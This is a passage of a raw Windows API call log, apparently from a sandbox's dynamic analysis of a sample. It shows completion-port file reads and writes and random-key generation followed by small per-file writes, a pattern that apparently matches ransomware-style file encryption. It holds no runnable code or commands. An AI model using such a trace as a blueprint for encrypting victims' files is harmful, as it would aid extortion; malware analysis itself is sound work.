lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.176] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.187] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x7c08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0168.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.203] ReadFile (in: hFile=0x338, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x7c08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0168.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0168.223] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.223] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.223] free (_Block=0x3e305b8) [0168.223] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.223] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.224] free (_Block=0x1fa91d0) [0168.224] free (_Block=0x1fa2ed8) [0168.224] free (_Block=0x1fa90b8) [0168.224] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0168.224] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.246] CloseHandle (hObject=0x2a4) returned 1 [0168.246] free (_Block=0x3d70450) [0168.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.249] CloseHandle (hObject=0x3cc) returned 1 [0168.249] free (_Block=0x3f70048) [0168.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.250] CloseHandle (hObject=0x2a8) returned 1 [0168.251] free (_Block=0x1ff1e60) [0168.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.251] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.400] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.412] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.423] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.442] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.442] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.458] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.473] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.487] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x72a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.510] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.515] CloseHandle (hObject=0x170) returned 1 [0168.516] free (_Block=0x1ff1e60) [0168.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.527] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0168.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.528] CloseHandle (hObject=0x338) returned 1 [0168.528] free (_Block=0x3d70450) [0168.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.612] CloseHandle (hObject=0x308) returned 1 [0168.612] free (_Block=0x3df0008) [0168.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.062] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.074] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.086] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.097] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.122] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.684] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x63a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.684] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.700] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.718] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.763] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7f68, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.764] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.765] CloseHandle (hObject=0x308) returned 1 [0169.765] free (_Block=0x1ff1e60) [0169.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.854] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.893] CloseHandle (hObject=0x170) returned 1 [0169.893] free (_Block=0x3df0008) [0169.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.905] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6d86, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.907] CloseHandle (hObject=0x338) returned 1 [0169.907] free (_Block=0x1ff1e60) [0169.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.922] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5e7b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0169.928] CloseHandle (hObject=0x170) returned 1 [0169.928] free (_Block=0x3df0008) [0169.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0170.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0170.951] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0170.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0170.951] free (_Block=0x3e305b8) [0170.951] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0170.951] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0170.951] free (_Block=0x1fa91d0) [0170.951] free (_Block=0x1fa2ed8) [0170.951] free (_Block=0x1fa90b8) [0170.951] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0170.952] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0170.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0170.960] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0170.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0170.960] free (_Block=0x3e305b8) [0170.960] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0170.960] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0170.960] free (_Block=0x1fa91d0) [0170.961] free (_Block=0x1fa2ed8) [0170.961] free (_Block=0x1fa90b8) [0170.961] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0170.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.966] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.966] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0170.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0170.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0170.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0170.967] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0170.967] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0170.967] free (_Block=0x3e305b8) [0170.967] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0170.967] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0170.968] free (_Block=0x1fa91d0) [0170.968] free (_Block=0x1fa2ed8) [0170.968] free (_Block=0x1fa90b8) [0170.968] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0170.968] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.978] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0170.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.988] CloseHandle (hObject=0x338) returned 1 [0170.988] free (_Block=0x1ff1e60) [0170.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0170.991] CloseHandle (hObject=0x2a8) returned 1 [0170.991] free (_Block=0x3f70048) [0170.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, 